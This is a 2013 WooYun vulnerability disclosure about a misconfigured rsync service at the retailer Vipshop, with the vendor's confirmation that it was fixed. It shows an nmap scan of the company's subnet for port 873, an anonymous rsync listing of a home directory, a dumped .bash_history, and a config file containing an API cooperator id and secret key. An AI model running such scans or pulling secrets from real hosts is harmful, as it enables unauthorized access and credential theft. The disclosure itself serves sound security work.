当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-017131
漏洞标题:
唯品会rsync导致的信息泄漏漏洞
相关厂商:
唯品会
漏洞作者:
路人甲
提交时间:
2013-01-09 17:32
修复时间:
2013-02-23 17:32
公开时间:
2013-02-23 17:32
漏洞类型:
系统/服务运维配置不当
危害等级:
自评Rank:
4
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-01-09: 细节已通知厂商并且等待厂商处理中
2013-01-11: 厂商已经确认,细节仅向厂商公开
2013-01-21: 细节向核心白帽子及相关领域专家公开
2013-01-31: 细节向普通白帽子公开
2013-02-10: 细节向实习白帽子公开
2013-02-23: 细节向公众公开

简要描述:

一个rsync错误设置导致敏感信息泄漏

详细说明:

首先呢,扫同网段啊,rsync很多人都没处理好,ping vipshop.com得到一个网段

nmap 180.186.22.1/24 -p873 --open
Starting Nmap 5.51 ( http://nmap.org ) at 2013-01-09 16:24 CST
Nmap scan report for 180.186.22.14
Host is up (0.0053s latency).
PORT    STATE SERVICE
873/tcp open  rsync
Nmap scan report for 180.186.22.22
Host is up (0.0043s latency).
PORT    STATE SERVICE
873/tcp open  rsync


好了发现一些了

rsync 180.186.22.14::m2
drwxr-xr-x        4096 2012/11/15 17:35:00 .
-rw-------        5433 2012/09/12 13:35:48 .bash_history
-rw-r--r--          33 2012/05/22 17:18:18 .bash_logout
-rw-r--r--         176 2012/05/22 17:18:18 .bash_profile
-rw-r--r--         124 2012/05/22 17:18:18 .bashrc
-rw-------          32 2012/07/13 10:42:30 .mysql_history
-rw-------        7708 2012/08/20 17:43:59 .viminfo
drwx------        4096 2012/07/13 10:44:56 .elinks
drwxr-xr-x        4096 2012/11/27 00:20:00 360
drwxr-xr-x        4096 2012/11/23 18:36:42 config
drwxr-xr-x        4096 2012/09/06 10:27:47 etao
drwxr-xr-x        4096 2012/12/20 00:30:01 filetemp
drwxr-xr-x        4096 2012/12/20 00:44:47 log
drwxr-xr-x        4096 2012/12/20 13:33:19 pictemp


漏洞证明:

cat .bash_history 
ls
ll
cd /usr/local/tomcat/
ls
./bin/shutdown.sh 
netstat -tpln
./bin/startup.sh 
ll
cd conf/
ls
vim server.xml 
cd ..
ls
./bin/shutdown.sh 
./bin/startup.sh 
tail -f logs/catalina.out 
netstat -tpln
w
exit
ls
cd /usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/startup.sh 
netstat -tpln
netstat -tpln
cd /usr/local/tomcat/
ls
tail -f logs/catalina.out 
vim logs/catalina.out 
vim /etc/hosts
hostname 
exit
ls
/usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/startup.sh 
ls
netstat -tpln
netstat -tpln
netstat -tpln
netstat -tpln
cd /usr/local/tomcat/
ls
cd logs/
tail -fn 200 catalina.out 
ls
netstat -tpln
vim catalina.out 
ls
cd ..
ls
cd conf/
ls
vim tomcat-users.xml 
ls
vim server.xml 
/usr/local/tomcat/bin/shutdown.sh 
netstat -tpln
/usr/local/tomcat/bin/startup.sh 
tail -f ../logs/catalina.out 
cd ..
ls
vim logs/catalina.out 
vim conf/server.xml 
ls
vim logs/catalina.out 
vim conf/server.xml 
ls
vim conf/tomcat-users.xml 
./bin/shutdown.sh 
./bin/startup.sh 
tail -f logs/catalina.out 
vim conf/tomcat-users.xml 
./bin/shutdown.sh 
./bin/startup.sh 
tail -f logs/catalina.out 
vim conf/tomcat-users.xml 
./bin/shutdown.sh 
./bin/startup.sh 
tail -f logs/catalina.out 
ex
exit
ls
/usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/startup.sh 
cd /usr/local/tomcat/
ls
cd logs/
ls
tail -f catalina.out 
w
top
tail -f catalina.out 
tail -f catalina.out 
/usr/local/tomcat/bin/shutdown.sh 
cd /usr/local/tomcat/bin/
ls
vim catalina.sh 
ls
/usr/local/tomcat/bin/startup.sh 
ls
cd ..
ls
tail -f logs/catalina.out 
ls
cd /data/vipPlatform/
ls
vim config/vipshop-config.xml 
ls
cd ..
cd /usr/local/tomcat/bin/
ls
vim catalina.sh 
/usr/local/tomcat/bin/shutdown.sh 
w
top
/usr/local/tomcat/bin/startup.sh 
cd ..
ls
tail -f logs/catalina.out 
cd /data/vipMobile/config/
ls
vim vipshop-config.xml 
cd /usr/
ls
cd cd /usr/local/tomcat/
ls
cd /usr/local/tomcat/
ls
cd webapps/
ls
cd /usr/local/mysql/
ls
cd data/
ls
top
/usr/local/tomcat/bin/shutdown.sh 
w
w
w
top
df -h
free -m
df -h
vim /etc/my.cnf 
/usr/local/tomcat/bin/startup.sh 
cd /usr/local/tomcat/
ls
tail -f logs/catalina.out 
/usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/startup.sh 
tail -f logs/catalina.out 
/usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/startup.sh 
tail -f logs/catalina.out 
tail -f logs/catalina.out 
tail -f logs/catalina.out 
w
top
tail -f logs/catalina.out 
tail -f logs/catalina.out 
/usr/local/tomcat/bin/shutdown.sh 
/usr/local/tomcat/bin/startup.sh 
tail -f logs/catalina.out 
/usr/local/tomcat/bin/shutdown.sh 
w
w
cd /usr/local/tomcat/webapps/
ls
ll
netstat -tpln
netstat -tpln
netstat -tpln
ls
*.war /tmp/
mv *.war /tmp/
ll
ll
/usr/local/tomcat/bin/startup.sh 
netstat -tpln
ll
rm -rf vipMobile
chown -R tomcat.tomcat .
cp ../vipPlatform.war  .
exit
ll
cp /usr/local/tomcat/vipMobile.war  /usr/local/tomcat/webapps/
cd /usr/local/tomcat/


cat vipshop-config.xml 
<?xml version="1.0" encoding="UTF-8" ?>
<vipshop-config>
	<config name="qqapi">
		<publish_to>qq</publish_to>
		<cooperatorid>855006109</cooperatorid>
		<secretkey>abcdefghabcdefghabcdefghabcdefgh</secretkey>
		<add_sku_method>addSKU</add_sku_method>
		<add_sku_url>http://apitest.buy.qq.com/item/addSKU.xhtml</add_sku_url>
		<add_sku_detail_method>addSKUDetail</add_sku_detail_method>
		<add_sku_detail_url>http://apitest.buy.qq.com/item/addSKUDetail.xhtml</add_sku_detail_url>
		<add_sku_pic_method>addSKUPic</add_sku_pic_method>
		<add_sku_pic_url>http://apitest.buy.qq.com/item/addSKUPic.xhtml</add_sku_pic_url>
		<add_sku_stock_method>modifySKUStock</add_sku_stock_method>
		<add_sku_stock_url>http://apitest.buy.qq.com/item/modifySKUStock.xhtml</add_sku_stock_url>
		<add_sku_batch_stock_method>batchModifySKUStock</add_sku_batch_stock_method>
		<add_sku_batch_stock_url>http://apitest.buy.qq.com/item/batchModifySKUStock.xhtml</add_sku_batch_stock_url>
		<queryDealList_method>queryDealListV2</queryDealList_method>
		<queryDealList_url>http://apitest.buy.qq.com/deal/queryDealListV2.xhtml</queryDealList_url>
		<queryDealDetail_method>queryDealDetailV2</queryDealDetail_method>
		<queryDealDetail_url>http://apitest.buy.qq.com/deal/queryDealDetailV2.xhtml</queryDealDetail_url>
		<signCheckResult_method>signCheckResultV2</signCheckResult_method>
		<signCheckResult_url>http://apitest.buy.qq.com/deal/signCheckResultV2.xhtml</signCheckResult_url>
		<signShip_method>signShipV2</signShip_method>
		<signShip_url>http://apitest.buy.qq.com/deal/signShipV2.xhtml</signShip_url>
		<signRecvState_method>signRecvStateV2</signRecvState_method>
		<signRecvState_url>http://apitest.buy.qq.com/deal/signRecvStateV2.xhtml</signRecvState_url>

修复方案:

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-01-11 14:21

厂商回复:

感谢提供,已经修复

最新状态:

暂无